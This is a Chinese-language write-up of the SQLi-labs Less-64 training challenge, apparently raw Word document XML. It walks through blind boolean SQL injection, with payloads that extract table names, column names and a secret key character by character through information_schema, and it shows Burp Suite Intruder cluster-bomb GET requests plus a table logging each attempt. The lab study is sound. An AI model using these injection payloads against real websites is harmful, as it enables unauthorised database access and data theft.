          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> from information_schema.columns where table_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>='</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4tz8xeeymz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">limit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,1),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,1)))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>=115</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>)--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>+得出第三列是我们需要的列，首字母为s，遵循其他题的格式secret_????</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6479B86D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</w:p>
    <w:p w14:paraId="22BAC383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之后再使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>?id=1))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(ascii(substr((select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> secret_KL4Q </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> challenges.4tz8xeeymz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,1))=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>$1$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>)--+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>d得出秘钥</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACF7CA4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</w:p>
    <w:p w14:paraId="607891A8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计算可得：需要二分爆破表名10个字符(范围0-9,a-z)，最少60次尝试；二分爆破列名4个字符(范围0-9,A-Z)，最少24次尝试；二分爆破秘钥15个字符(范围0-9,a-z,A-Z)，最少需要105次尝试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3616AA08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vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>理论上需要log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:vertAlign w:val="subscript"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(36</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>·62</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>)≈225.6次尝试，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>不能使用手注法得出秘钥。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072D5631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</w:p>
    <w:p w14:paraId="0590C6AA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根据以上结论应使用burpsuite进行集群炸弹爆破得出秘钥</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5605D3E0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(会远远超过尝试次数，仅为能够得出秘钥)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED547D1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使用burpsuite爆破：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A47BF3C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拦截SQLi-lab网站(使用内置浏览器或者使用外置浏览器不屏蔽掉localhost或使用ipv4地址进行访问)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E0A82B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jc w:val="both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将拦截内容导入Inturder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30743D0B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jc w:val="both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创建两个payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B331FF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下文将使用$n$代替第n个payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165AF4AA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jc w:val="both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选择集群炸弹攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F5FABC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jc w:val="both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设置payload范围(payload1数值(需要爆破的具体位置);payload2数值(ascii码范围，选择48~122))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17567C0C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jc w:val="both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开始攻击后使用长度排序，筛选出最长(正确显示多余信息)的payload2为payload1位置的ascii码值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206024E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ind w:leftChars="0"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64BC8A4F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以下截取第一行内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776ED072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GET /SQL/Less-64/?id=1))%20and%20((ascii(substr((select%20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>%20from%20information_schema.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>s%20where%20table_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>schema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>=%27</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>challenges</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>%27%20limit%20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,1),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>$1$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,1)))=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>$2$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>)--+ HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CEF117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暴力破解，一共请求(122-48+1)*10次</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F308C64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4557395" cy="3778250"/>
            <wp:effectExtent l="0" t="0" r="1905" b="6350"/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57395" cy="377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73C19F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得出表名f3vbm2riil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EA32C4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</w:p>
    <w:p w14:paraId="788D2D8A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GET /SQL/Less-64/?id=1))%20and%20(ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name=%27</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>f3vbm2riil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>%27%20limit%202,1),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>$1$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,1))=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>$2$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>)--+ HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A156350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暴力破解，一共请求(122-48+1)*4次</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA2BCA1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</w:pPr>
    </w:p>
    <w:p w14:paraId="264A6077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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4642485" cy="2376805"/>
            <wp:effectExtent l="0" t="0" r="5715" b="10795"/>
            <wp:docPr id="1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/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:srcRect b="44093"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4642485" cy="237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007611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得到列名：secret_6R4N</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755AF7E9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</w:p>
    <w:p w14:paraId="1BAE11F6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>GET /SQL/Less-64/?id=1))%20and%20(ascii(substr((select%20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>secret_6R4N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>%20from%20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>challenges.f3vbm2riil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,1))=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>$1$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>)--+ HTTP/1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FB4EC3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暴力破解，一共请求(122-48+1)*24次</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B76117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</w:pPr>
    </w:p>
    <w:p w14:paraId="5D033EE9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5267325" cy="3306445"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2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8"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:srcRect b="3144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0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37C35C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</w:p>
    <w:p w14:paraId="61E4A74C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得到秘钥：KPZQrJtEzDdt6Hw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C323AE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由于尝试次数超过130，判为失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E9709D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0"/>
        <w:gridCol w:w="5331"/>
        <w:gridCol w:w="2007"/>
      </w:tblGrid>
      <w:tr w14:paraId="258925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0" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4874CB" w:themeFill="accent1"/>
          </w:tcPr>
          <w:p w14:paraId="480681F6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i w:val="0"/>
                <w:color w:val="FFFFFF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i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>尝试次数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5331" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4874CB" w:themeFill="accent1"/>
          </w:tcPr>
          <w:p w14:paraId="005C12EC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i w:val="0"/>
                <w:color w:val="FFFFFF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i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>使用payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2007" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4874CB" w:themeFill="accent1"/>
          </w:tcPr>
          <w:p w14:paraId="4F6B905B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i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="36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i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>使用payload原因</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="505505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0" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="4874CB" w:themeColor="accent1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311CCFAD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>1-9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5331" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="4874CB" w:themeColor="accent1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44DBB380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>?id=1</w:t>
            </w:r>
            <w:r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  <w:t>’</w:t>
            </w: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 xml:space="preserve"> ?id=1</w:t>
            </w:r>
            <w:r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  <w:t>”</w:t>
            </w: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>...</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2007" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="4874CB" w:themeColor="accent1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4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7F6F455D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判断使用boolean注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4D11B1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0" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="4874CB" w:themeColor="accent1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05B3F53E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>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5331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707D74BF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?id=1)) and length(database())=10--+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2007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4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4856A9C3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获取数据库名长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5F43F1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0" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="4874CB" w:themeColor="accent1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19DD157E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>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5331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23EBD806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?id=1)) and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>substr(database(),1,1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>)=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>’</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>challenges</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>’</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>--+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2007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4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5729E06D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获取数据库名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="300ED9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0" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="4874CB" w:themeColor="accent1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27337503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>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5331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29D652B6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?id=1)) and length(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">(select table_name from information_schema.tables where table_schema='challenges' limit </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>,1)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>)=10--+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2007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4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="18E53BFB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>获取表名长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="34989E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0" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="5D246DF6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>13-90</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5331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4874CB" w:themeColor="accent1" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="B5C7EA" w:themeColor="accent1" w:themeTint="66" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w14:paraId="784977B1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?id=1)) and ((ascii(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>substr</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">((select table_name from information_schema.tables where table_schema='challenges' limit </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>,1),</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>x</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
